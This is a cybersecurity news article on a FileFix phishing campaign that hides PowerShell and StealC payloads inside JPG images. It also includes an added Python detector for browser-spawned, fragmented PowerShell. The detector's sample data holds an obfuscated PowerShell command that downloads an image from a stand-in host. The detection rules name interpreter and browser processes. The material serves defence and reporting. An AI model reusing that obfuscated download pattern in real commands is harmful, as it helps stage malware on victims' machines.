Acronis’ Threat Research Unit has found something new and worrying: a FileFix campaign operating in the wild that does not stick to the original proof of concept. It is clever, quiet, and it hides its work inside pictures.
The short version: attackers moved FileFix from lab note to live attack. They layered obfuscation, multilingual phishing, and steganography to keep one step ahead of defenders. The endgame is an infostealer called StealC. The path there is long and purpose-built.
What the bad actors do, in plain terms, is ask the victim to do the work. That is the essence of these attacks. ClickFix asks people to paste a command into a Run window or terminal. FileFix asks them to paste into a file upload address bar instead. Both ask for trust and a keystroke. Both rely on a human being willing to follow instructions.
Fake Facebook Security Page
This campaign used a convincing fake Facebook security page. The text said an account would be suspended. The button promised an incident report. The bait was realistic. The pressure was real. The victim clicks. They paste what looks like a file path and then nothing seems to work. The page blocks progress. The user sees an error. The machine, quietly, is not idle.
Under the hood the attack is multistage. The first-stage PowerShell snippet is long and heavily broken up into variables and fragments so pattern-based defenses struggle to see the threat. The snippet fetches a JPG from a public host. The image looks innocent. It does not raise alarms. But inside its bytes there lives a second-stage PowerShell script and encrypted executable payloads. The second stage extracts, decrypts and decompresses those files. Then a Go-based loader runs checks, decrypts shellcode and unpacks StealC in memory.
Steganography is the clever bit. The attackers embed both scripts and encrypted binaries into ordinary-looking images. The images are often AI-like pastoral scenes. That choice is odd and effective. Security teams do not usually treat a downloaded JPG as suspicious. The image acts as a carrier and a decoy. It buys time and obscures the payload.
Obfuscation is Everywhere
Obfuscation is everywhere. JavaScript on the phishing site is minified from roughly 18,000 lines down to a dozen. Function and variable names are meaningless strings. Code is split and scattered. Some variants encrypt the download URL with XOR and hide it as hex. The payloads evolved in two weeks. Earlier attacks used single-stage scripts or different obfuscators. Later ones moved payload hosting to Bitbucket to blend in and reduce the need for attacker-owned domains.
The final payload is a loader written in Go. It runs basic virtual machine checks and decrypts API names at runtime. Then it loads shellcode and runs StealC. The infostealer looks for browsers, crypto wallets, messaging apps and cloud credentials. Its list is long: Chrome, Firefox, Opera, Tencent browsers, a long roll of wallets and tools, and keys for services like AWS and Azure. StealC can also fetch and run additional modules.
This campaign is not a one-country affair. VirusTotal submissions linked to the infrastructure come from many places. The phishing site supports at least 16 languages. The C2 we observed is registered in Germany but that says little about the operators. The tradecraft and the rapid iteration suggest a group that tests and refines its tools.
Why this matters now: the *Fix family of attacks has gone from curiosity to utility. ClickFix already made the jump. FileFix appears to be following fast. FileFix can be more persuasive than ClickFix because most users have used file upload windows. Few have ever used a terminal. That makes the social engineering simpler and, in some environments, more likely to succeed.
Practical Steps for Defenders
Defenders can act. First, educate users. Teach them that no legitimate site will ask them to paste anything into system dialogs or file upload bars. Make clipboard hygiene part of phishing training. Train users to question any website that asks them to run or paste system commands. Second, harden execution paths. Block PowerShell, CMD, MSIEXEC and MSHTA processes spawned as children of web browsers where possible. That control should not break normal business workflows and will stop this attack chain before code runs.
There are additional options worth considering. Flag or quarantine images downloaded via PowerShell commands. Alert on web browsers spawning unexpected child processes. Watch for unusually long or fragmented PowerShell commands that piece together class and namespace names as variables. Those signs are noisy but useful.
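The three detection ideas above (a browser spawning a script interpreter, an unusually long PowerShell command line, and a command line that pieces names together from variables) as an added example, not code from Acronis or this article. It runs over constructed Sysmon-style process-creation records; the field names, process lists and thresholds are assumptions to tune per environment.

```python
"""Heuristic detection for FileFix/ClickFix-style process chains (added example, constructed data)."""
import re

# Interpreters a browser should not be launching (article: PowerShell, CMD, MSIEXEC, MSHTA).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msiexec.exe"}
BROWSER_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}  # assumed list
LONG_CMDLINE = 1000  # assumed threshold in characters
FRAGMENT_MIN = 5     # assumed: assignments + concatenations that count as "fragmented"

ASSIGN_RE = re.compile(r"\$[A-Za-z_]\w*\s*=")     # $a = ...
CONCAT_RE = re.compile(r"""['"]\s*\+\s*['"]""")   # 'Net.We'+'bClient'


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def fragmentation_score(cmdline: str) -> int:
    """Count variable assignments and string concatenations in a command line."""
    return len(ASSIGN_RE.findall(cmdline)) + len(CONCAT_RE.findall(cmdline))


def evaluate(event: dict) -> list[str]:
    """Return the reasons one process-creation event looks like a *Fix chain."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event.get("CommandLine", "")
    reasons = []
    if child in INTERPRETERS and parent in BROWSER_PARENTS:
        reasons.append(f"{parent} spawned {child}")
    if child in {"powershell.exe", "pwsh.exe"}:
        if len(cmd) > LONG_CMDLINE:
            reasons.append("unusually long PowerShell command line")
        score = fragmentation_score(cmd)
        if score >= FRAGMENT_MIN:  # parent is explorer.exe when pasted into the File Explorer address bar
            reasons.append(f"fragmented PowerShell command line (score {score}, parent {parent})")
    return reasons


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that triggers at least one rule."""
    return [(i, r) for i, ev in enumerate(events) if (r := evaluate(ev))]


# Constructed sample records, not real telemetry: event 0 mimics a FileFix paste, event 1 a browser
# spawning cmd; events 2 and 3 are ordinary admin activity that must not fire.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden $a='Net.We'+'bCli'+'ent';$b='Downl'+'oadData';"
                    "$c=New-Object $a;$d=$c.$b('http://example.invalid/scene.jpg')"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS, "CommandLine": "powershell Get-ChildItem"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(why))
```

Only the two constructed suspicious records fire; the fragmentation score is the noisy rule the article warns about, so tune FRAGMENT_MIN against your own baseline before alerting on it.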
FileFix has moved past proof of concept. It now hides code in pictures and rides in plain sight. Expect more variants. Expect the techniques to mutate. Watch for images that are more than they seem. And teach users not to paste trust into a browser window.
Innovating Faster Than We Can Respond
Louis Eichenbaum, Federal CTO at ColorTokens, says cyberattacks are becoming more sophisticated every day. “It’s no longer realistic to believe we can prevent every breach. Our adversaries are innovating faster than we can respond, and despite all the end-user training we provide, it only takes one careless click for an attacker to gain a foothold inside a network.
“This is why it’s more important than ever for cybersecurity professionals to embrace Zero Trust. The core principle of Zero Trust is simple: assume the adversary will breach your network. The question then becomes what happens next?”
Eichenbaum says it starts with identifying your organization’s most critical assets. “From there, you design a microsegmentation strategy by placing security controls as close to those assets as possible. That way, even if a user device is compromised, the attacker cannot move laterally across the network to reach high-value targets.”
Zero Trust doesn’t stop every attack, he explains, but it reduces the blast radius of a breach and builds resilience directly into the network. “For years, cybersecurity strategies have focused almost exclusively on prevention. Prevention is still important, but we must acknowledge that breaches are inevitable. Our job now is to combine prevention with resilience by accepting that intrusions will happen and ensuring they cannot spread unchecked.”
Zero Trust is how we achieve that resilience, Eichenbaum adds.
Modernizing Human-in-the-Loop Tradecraft
Jason Soroko, Senior Fellow at Sectigo, believes this campaign matters because it modernizes human-in-the-loop tradecraft and takes advantage of user trust in familiar workflows and brands. “This includes real-looking Facebook Security pages and reputable code hosting. By hiding payloads inside images fetched from Bitbucket and triggering local execution through File Explorer, it slips past filters that expect obvious downloads or Run dialog abuse and it causes a condition for session cookie theft that can bypass MFA.”
Soroko says entities should update awareness content to flag any site that instructs users to paste strings into the File Explorer address bar and any upload flow that deviates from normal choose file behavior.
“Security teams should harden endpoints with application control for script interpreters and common living off the land tools, block or alert when browsers or explorer spawn cmd or powershell, restrict outbound access to developer platforms on non-developer machines, and watch for image downloads followed by process creation or archive writes. Add detections for explorer launching network-aware tools, monitor for unusual Bitbucket traffic, and tune EDR to catch steganography-style unpacking patterns. Use tighter session defenses using short-lived tokens, reauthentication on sensitive actions, and stronger forms of authentication to blunt the value of stolen cookies.”
A Social Engineering Pattern
FileFix is a social engineering pattern that updates the older ClickFix trick, Soroko continues. “Instead of telling a victim to open the Windows Run box and paste a command during a fake verification step, the page walks them into a file upload flow, gets them into the system file picker and then convinces the victim to paste a provided string into the File Explorer address bar. Windows treats this as a command that runs locally without a download prompt. The initial script then retrieves images that conceal code, reconstructs the loader, and deploys the StealC infostealer.”
He says StealC is a widely traded commodity stealer that has appeared within the last few years and is rented to affiliates, harvesting browser passwords, cookies, autofill data, crypto wallets, and messaging tokens while using frequent updates and anti-analysis checks. “Its low barrier to entry and steady development cadence make it a favorite for adversaries that prefer social engineering and trusted services over exploits, which means the best counter is a blend of user awareness for abnormal flows, strict process and egress controls.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.